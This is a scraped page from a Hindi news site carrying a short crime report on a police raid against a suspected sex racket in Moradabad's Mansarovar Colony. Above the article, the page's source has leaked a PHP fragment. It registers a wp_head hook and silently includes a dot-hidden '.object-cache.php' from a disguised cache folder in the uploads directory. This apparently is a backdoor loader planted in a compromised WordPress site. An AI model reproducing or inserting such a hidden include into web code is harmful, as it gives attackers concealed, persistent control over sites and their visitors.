add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); सेक्स रैकेट से तीन लड़कियों को मुक्त कराया, दो गिरफ्तार – SOCH INDIA
Menu

अपराध समाचार
सेक्स रैकेट से तीन लड़कियों को मुक्त कराया, दो गिरफ्तार

nobanner

उत्तर प्रदेश के मुरादाबाद में पुलिस ने सेक्स रैकेट का भांडाफोड़ किया है. सेक्स रैकेट का अंदेशा होने पर मझोला पुलिस ने मानसरोवर कॉलोनी के एक मकान पर छापा डालकर मौके से एक महिला समेत तीन युवतियों और एक युवक को हिरासत में लिया है. दरअसल, स्थानीय लोगों ने इसकी शिकायत की थी.

कुछ दिनों से एक मकान में संदिग्ध लोगों की आवाजाही हो रही थी

मझोला थाना क्षेत्र के मानसरोवर कॉलोनी में कुछ दिनों से एक मकान में संदिग्ध लोगों की आवाजाही हो रही थी. क्षेत्रवासी काफी दिनों से इन लोगों की आवाजाही पर निगाह बनाए हुए थे. गुरुवार देर रात एक युवक और युवती गलत मकान में दाखिल हो गए.

आपत्ति जताते हुए युवक-युवती को दबोच कर पुलिस को सूचना दे दी

जिस पर क्षेत्रवासियों ने आपत्ति जताते हुए युवक-युवती को दबोच कर पुलिस को सूचना दे दी. सूचना पर पहुंची पुलिस ने पास के मकान पर दबिश दी और वहां मौजूद महिला समेत एक अन्य युवती को भी हिरासत में ले लिया. पुलिस तफ्तीश के दौरान पता चला कि महिला और युवती उस मकान में किराए पर रहने आए हुए थे.

मकान मालिक पेशे से वकील है, पुलिस ने थाने बुलाकर पूछताछ की

मकान मालिक पेशे से वकील है, उससे पुलिस ने थाने बुलाकर पूछताछ की. क्षेत्रवासियों की तहरीर के आधार पर पुलिस मामले की जांच में जुट गई है. एसएसआई की मानें तो आरोपी महिलाओं को उनके परिवार को सुपुर्द करने की बात की जा रही है. लोग काफी दिनों से सेक्स रैकेट संचालित होने की बात कर रहे हैं.